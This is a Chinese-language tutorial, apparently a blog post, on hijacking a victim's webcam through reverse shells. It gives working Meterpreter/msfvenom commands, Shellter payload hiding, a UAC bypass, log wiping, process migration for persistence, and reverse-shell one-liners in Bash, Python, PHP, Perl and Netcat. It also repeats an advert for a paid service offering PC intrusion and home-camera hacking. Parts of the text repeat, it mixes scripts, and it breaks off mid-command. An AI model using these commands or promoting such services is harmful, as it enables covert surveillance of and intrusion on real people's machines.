如果你已經用膠條封住了你的網路攝像頭,你可能是因為聽說過駭客或NSA可以遠程監視你。那麼問題來了,這些你素未謀面人又是如何遠程連接到你的機器並監視你的呢?私人電腦入侵破解 遠程控制 電腦調取私人檔案 電腦程式入侵破解 家庭攝像頭破解控制 破解支援服務聯絡電郵pvip366@outlook.com(7*24小時在線服務)
這可能是因為你將你的CCTV,IP攝像頭公開暴露在了互聯網上,而攻擊者又在Shodan等網站上發現了它們。加之你又沒有更改它們的默認密碼和bam,導致攻擊者順利控制了你的攝像頭,並對你的一舉一動進行監視。
以上是物聯網攝像頭最常見的安全問題。但如果是內置的網路攝像頭,那麼更可能的解釋是攻擊者通過Meterpreter payload入侵並控制了它。使用Meterpreter攻擊者可以獲取到一個反向shell,這也是本文將要討論的內容。
這裏,你可能有個疑問。為什麼攻擊者不直接訪問你的機器,而是通過一個反向shell呢?其實原因很簡單,因為直接訪問的方式很可能會被阻止。相比起出站流量,入站流量更容易受到限制。另一方面,如果我們主動進行連接,那麼目標機器更有可能放行該流量。這是因為目標機器想要與我們的機器建立連接。
msfvenom是一個框架,我們將用它來獲取一個反向shell。它已被預裝在了Parrot和Kali上。首先,讓我們運行以下命令來創建Meterpreter reverse TCP shell payload。
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe
創建完成後,現在讓我們來上傳它……….blocked。這是因為MeterPreter payload名聲在外,早已被各個安全軟體所標記,因此大多數的安全軟體都能夠發現阻止/隔離它。
我們可以嘗試使用一個名為Shellter的工具,來更改其哈希並將反向shell嵌入到另一個檔當中。之所以選擇將shell嵌入到一個安裝檔中,是因為大多數安裝檔需要以管理員身份運行。正如你在之後將看到的那樣,以管理員身份運行漏洞利用程式,可以為我們省去很多的麻煩。私人電腦入侵破解 遠程控制 電腦調取私人檔案 電腦程式入侵破解 家庭攝像頭破解控制 破解支援服務聯絡電郵pvip366@outlook.com(7*24小時在線服務)
你可以通過shelter來直接啟動它。同樣,它已被預裝在了Parrot和Kali上。
讓我們使用Auto [A]並定位我為本例創建的可執行檔。
接下來,我們選擇反向TCP shell並輸入我們機器的IP和端口(攻擊者)。完成後,它會將shell嵌入到你選擇的exe檔中,以便你將其上傳到目標機器。現在你需要通過一種方法將它放到目標機器上,但對於本例我將複製並粘貼。
雖然,我們隱藏了Meterpreter shell,但AV還是成功地檢測到了它。為了便於我們的演示,我們現在暫時先將AV關閉。當然,在現實場景中攻擊者不可能像我這麼隨意,更多的是通過技術手段擊潰AV,或是創建一個目標無法檢測的payload。
然而,儘管遮罩了Meterpreter外殼,AV仍設法檢測到它。 我現在就打算把它關掉,因為我可以。 在現實世界中,攻擊者會將AV癱瘓或使其盲目,以便他們可以降低有效載荷。
現在,讓我們運行它。
在開始之前,讓我們在攻擊機機上加載msfconsole(Metasploit)並運行以下命令:
msfconsoleuse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.X.Xset LPORT 4444
run
你的會話將偵聽反向shell腳本中指定的端口和IP。現在,我們以用戶身份運行exploit:
正如你在右側所看到的,我們有幾次會話建立失敗的情況。這就是我之前提到的為什麼需要用戶以管理員身份運行的原因。那樣就可以順利運行和注入所有的腳本和DLL。如果用戶以管理員身份運行,你將不會看到任何失敗的情況。如下所示:
成功獲取反向shell後,現在我們就可以針對目標機器執行我們想要的操作了。如果你的目標是攝像頭,那麼你可以執行以下操作:
Show Webcams: webcam_list
Webcam Snap Help: webcam_snap -h
Take a Picture and don’t load the image after: webcam_snap -i 1 -v falseRecord audio: record_micRecord Webcam: run webcam -p /var/www/Stop recording: run webcam -s
不僅僅是網路攝像頭(Webcams)。你還可以執行更多其他的命令。例如:清除所有日誌(應用程式,系統和安全日誌):clearev
這只是一個例子,駭客也不太可能會運行它。因為這麼做反而會打草驚蛇提醒了管理員。如果一臺機器你發現所有日誌都被清除了,那麼你可以初步斷定有人已經使用過它了。相反,攻擊者更有可能的是刪除選擇的事件來掩蓋他們的痕跡。
所有這些都需要管理員許可權,而你的用戶可能無法使用提升的許可權來運行它。那麼,你可以使用像bypassuac_comhijacker這樣的命令。首先,你仍需要得到一個普通用戶級別的反向shell。
獲得shell後,輸入background並按Enter鍵。這會將當前會話移至後臺。然後你就可以針對當前會話使用bypassuac_comhijack漏洞利用程式了,如下:私人電腦入侵破解 遠程控制 電腦調取私人檔案 電腦程式入侵破解 家庭攝像頭破解控制 破解支援服務聯絡電郵pvip366@outlook.com(7*24小時在線服務)
然後,你可以回到原始會話並運行以下命令:
成功運行後,你將獲取到一個admin shell。為了與目標機器建立長期穩定的後門連接,我們需要將我們的反向shell隱藏在一個更為隱蔽和穩定的進程中(而不是Putty exe或installer檔中)因為這些應用一旦被關閉,我們的連接就將丟失。這就是為什麼我們需要儘快遷移我們的反向shell,到那些可以持續運行進程中的原因。
找到相对稳定的进程后,运行migrate [PID]
然后,它会将你的Meterpreter会话迁移到另一个进程中。这样即使他们关闭了被利用的应用程序,你的会话也将被保留。
正如你所看到的,Meterpreter非常的强大。但这并不是你获得反向shell的唯一方法。你还可以使用Netcat。相比起Meterpreter,某些AV供应商并不将其视为威胁。你可以点击此处,查看virustotal中的检测结果。
你可以在Parrot或Kali上的usr/share/windows-binaries/nc.exe下找到Netcat。将nc.exe上传到目标机器后,我们可以运行nc.exe [Attacker IP] [Port] -e cmd.exe。
在攻击者机器上我们需要侦听连接,这可以通过运行nc -lvp [Chosen port]命令来完成。
你将获取到一个普通用户权限的简单反向shell,这对你来说是一个好的开始。然后,你可以通过它来进一步的利用系统获得管理员权限。以下是一些运行反向shell的示例:
PHP
php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Bash
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
Netcat Linux
nc 192.168.0.10 1234 -e /bin/sh
Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Perl
perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,
私人電腦入侵破解 遠程控制 電腦調取私人檔案 電腦程式入侵破解 家庭攝像頭破解控制 破解支援服務聯絡電郵pvip366@outlook.com(7*24小時在線服務)
留言列表